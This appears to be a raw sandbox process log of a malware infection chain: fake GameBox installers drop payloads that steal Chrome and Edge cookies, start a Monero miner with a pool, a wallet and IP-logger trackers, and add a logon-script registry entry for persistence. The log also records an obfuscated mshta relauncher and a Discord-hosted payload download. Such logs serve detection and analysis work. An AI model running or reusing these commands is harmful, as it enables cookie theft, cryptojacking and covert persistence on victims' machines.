C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-96CCO.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-96CCO.tmp\Stats.tmp" /SL5="$50124,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-8KHSO.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8KHSO.tmp\Inlog.tmp" /SL5="$30320,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-40JC3.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-40JC3.tmp\WEATHER Manager.tmp" /SL5="$103D8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Users\Admin\AppData\Local\Temp\is-OH5HF.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OH5HF.tmp\MediaBurner2.tmp" /SL5="$10410,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\is-E326R.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E326R.tmp\VPN.tmp" /SL5="$1040E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\is-JLJVJ.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-JLJVJ.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Users\Admin\AppData\Local\Temp\is-JJV0D.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-JJV0D.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\is-28PC5.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-28PC5.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4748 -ip 4748
C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp" /SL5="$202AC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-28PC5.tmp\Setup.exe" /silent /subid=720
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 620 -p 4984 -ip 4984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 296
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\8760295.exe
"C:\Users\Admin\AppData\Roaming\8760295.exe"
C:\Users\Admin\AppData\Roaming\8237174.exe
"C:\Users\Admin\AppData\Roaming\8237174.exe"
C:\Users\Admin\AppData\Local\Temp\tmp6F93_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp6F93_tmp.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\3194562.exe
"C:\Users\Admin\AppData\Roaming\3194562.exe"
C:\Users\Admin\AppData\Roaming\3945035.exe
"C:\Users\Admin\AppData\Roaming\3945035.exe"
C:\Users\Admin\AppData\Roaming\3474119.exe
"C:\Users\Admin\AppData\Roaming\3474119.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4984 -s 2396
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 6060 -ip 6060
C:\Users\Admin\AppData\Local\Temp\A8C4.exe
C:\Users\Admin\AppData\Local\Temp\A8C4.exe
C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6060 -s 784
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Users\Admin\AppData\Local\Temp\B170.exe
C:\Users\Admin\AppData\Local\Temp\B170.exe
C:\Users\Admin\AppData\Local\Temp\is-KG9O2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KG9O2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp" /SL5="$10562,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-KG9O2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6976 -ip 6976
C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe
"C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6492 -ip 6492
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-S4STK.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Users\Admin\AppData\Local\Temp\C1DC.exe
C:\Users\Admin\AppData\Local\Temp\C1DC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 460
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-S4STK.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 280
C:\Users\Admin\AppData\Local\Temp\D015.exe
C:\Users\Admin\AppData\Local\Temp\D015.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5156 -ip 5156
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CBCA5D7D849EEF7D36EAEC2EF06B5D9E C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 2428
C:\Users\Admin\Documents\owFqBL4Mq_bjxI_jtXSsUZJg.exe
"C:\Users\Admin\Documents\owFqBL4Mq_bjxI_jtXSsUZJg.exe"
C:\Users\Admin\Documents\_JJo0aCHq8mE0uPnZ_nQeUca.exe
"C:\Users\Admin\Documents\_JJo0aCHq8mE0uPnZ_nQeUca.exe"
C:\Users\Admin\Documents\bqy_6J47oiL9FnZalOOXA5IJ.exe
"C:\Users\Admin\Documents\bqy_6J47oiL9FnZalOOXA5IJ.exe"
C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe
"C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe"
C:\Users\Admin\Documents\9tgLoG72Gq9TsKPb2rKWvimJ.exe
"C:\Users\Admin\Documents\9tgLoG72Gq9TsKPb2rKWvimJ.exe"
C:\Users\Admin\Documents\R9zIv64hHexXpZ5PXOJdUYDR.exe
"C:\Users\Admin\Documents\R9zIv64hHexXpZ5PXOJdUYDR.exe"
C:\Users\Admin\Documents\qi0VkDxuslJp96BClqOxZQV1.exe
"C:\Users\Admin\Documents\qi0VkDxuslJp96BClqOxZQV1.exe"
C:\Users\Admin\Documents\ZHYhIavsfxgIeCf6Z3BlV1bl.exe
"C:\Users\Admin\Documents\ZHYhIavsfxgIeCf6Z3BlV1bl.exe"
C:\Users\Admin\Documents\S1uFCzZAnSugBlQxsoLrJwEx.exe
"C:\Users\Admin\Documents\S1uFCzZAnSugBlQxsoLrJwEx.exe"
C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe
"C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe"
C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe
"C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe"
C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe
"C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Users\Admin\Documents\efkymguUelvwC2af_1bU5zZ0.exe
"C:\Users\Admin\Documents\efkymguUelvwC2af_1bU5zZ0.exe"
C:\Users\Admin\Documents\kz7bTmxYNsyXSGVl8HVLBc7z.exe
"C:\Users\Admin\Documents\kz7bTmxYNsyXSGVl8HVLBc7z.exe"
C:\Users\Admin\Documents\0RpCtOzy5DCg5JBxs7Ep8iOY.exe
"C:\Users\Admin\Documents\0RpCtOzy5DCg5JBxs7Ep8iOY.exe"
C:\Users\Admin\Documents\PXG3Q19rY_ZS613IIsY4GFX5.exe
"C:\Users\Admin\Documents\PXG3Q19rY_ZS613IIsY4GFX5.exe"
C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe
"C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe"
C:\Users\Admin\Documents\xP8RH8dal6K2p0l5NBxp1SE1.exe
"C:\Users\Admin\Documents\xP8RH8dal6K2p0l5NBxp1SE1.exe"
C:\Users\Admin\Documents\8clEFitrHndhHr1e_qlt20Dg.exe
"C:\Users\Admin\Documents\8clEFitrHndhHr1e_qlt20Dg.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\F6C7.bat C:\Users\Admin\Documents\R9zIv64hHexXpZ5PXOJdUYDR.exe"
C:\Users\Admin\Documents\Q0u4QqQuwOtV8hpGxmRkcW7R.exe
"C:\Users\Admin\Documents\Q0u4QqQuwOtV8hpGxmRkcW7R.exe"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\Documents\Uhe4_ggcq91zJxxmcC9oKfbz.exe
"C:\Users\Admin\Documents\Uhe4_ggcq91zJxxmcC9oKfbz.exe"
C:\Users\Admin\Documents\OHaRPl9eF_Obb3ELJ2eCrs1S.exe
"C:\Users\Admin\Documents\OHaRPl9eF_Obb3ELJ2eCrs1S.exe"
C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe
"C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Users\Admin\AppData\Local\Temp\is-67VSD.tmp\8clEFitrHndhHr1e_qlt20Dg.tmp
"C:\Users\Admin\AppData\Local\Temp\is-67VSD.tmp\8clEFitrHndhHr1e_qlt20Dg.tmp" /SL5="$10608,138429,56832,C:\Users\Admin\Documents\8clEFitrHndhHr1e_qlt20Dg.exe"
C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe
"C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5180 -ip 5180
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 8016 -ip 8016
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4304 -ip 4304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 7740 -ip 7740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 328
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E9B7D517B45ADDBF0B0F2F3878C5BC2B C
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "bAyNyrmy2ppVz_z1MLKe0uRF.exe" -f
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 292
C:\Users\Admin\Documents\qi0VkDxuslJp96BClqOxZQV1.exe
"C:\Users\Admin\Documents\qi0VkDxuslJp96BClqOxZQV1.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7740 -s 276
C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe
C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\2115.exe
C:\Users\Admin\AppData\Local\Temp\2115.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7520 -ip 7520
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Roaming\2038972.exe
"C:\Users\Admin\AppData\Roaming\2038972.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2368 -ip 2368
C:\Users\Admin\AppData\Roaming\6253116.exe
"C:\Users\Admin\AppData\Roaming\6253116.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7384 -ip 7384
C:\Users\Admin\AppData\Roaming\8206888.exe
"C:\Users\Admin\AppData\Roaming\8206888.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 296
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Roaming\3635818.exe
"C:\Users\Admin\AppData\Roaming\3635818.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7588 -ip 7588
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 272
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\AppData\Local\Temp\4BEE.exe
C:\Users\Admin\AppData\Local\Temp\4BEE.exe
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B22C46F76184C1087E488425E4AA0072
C:\Users\Admin\AppData\Local\Temp\is-S4STK.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-S4STK.tmp\{app}\vdi_compiler"
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 292
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1060 -ip 1060
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Program Files\Common Files\MLZGUBILYF\ultramediaburner.exe
"C:\Program Files\Common Files\MLZGUBILYF\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 2424 -ip 2424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5808 -ip 5808
C:\Users\Admin\AppData\Local\Temp\14322\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7812 -ip 7812
C:\Users\Admin\AppData\Local\Temp\is-QTUI2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QTUI2.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 272
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Users\Admin\AppData\Local\Temp\is-6481D.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6481D.tmp\ultramediaburner.tmp" /SL5="$70024,281924,62464,C:\Program Files\Common Files\MLZGUBILYF\ultramediaburner.exe" /VERYSILENT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7508 -ip 7508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7812 -s 276
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\2b-2d576-0af-efe9c-05b4a607072c7\Byjaevyfona.exe
"C:\Users\Admin\AppData\Local\Temp\2b-2d576-0af-efe9c-05b4a607072c7\Byjaevyfona.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 276
C:\Users\Admin\AppData\Local\Temp\2f-f3548-972-255a7-0e9bda818cb94\Dozhopaejuty.exe
"C:\Users\Admin\AppData\Local\Temp\2f-f3548-972-255a7-0e9bda818cb94\Dozhopaejuty.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6aead40f-9a52-764a-bbde-4c732aca755e}\oemvista.inf" "9" "4d14a44ff" "0000000000000140" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6404 -ip 6404
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 2284
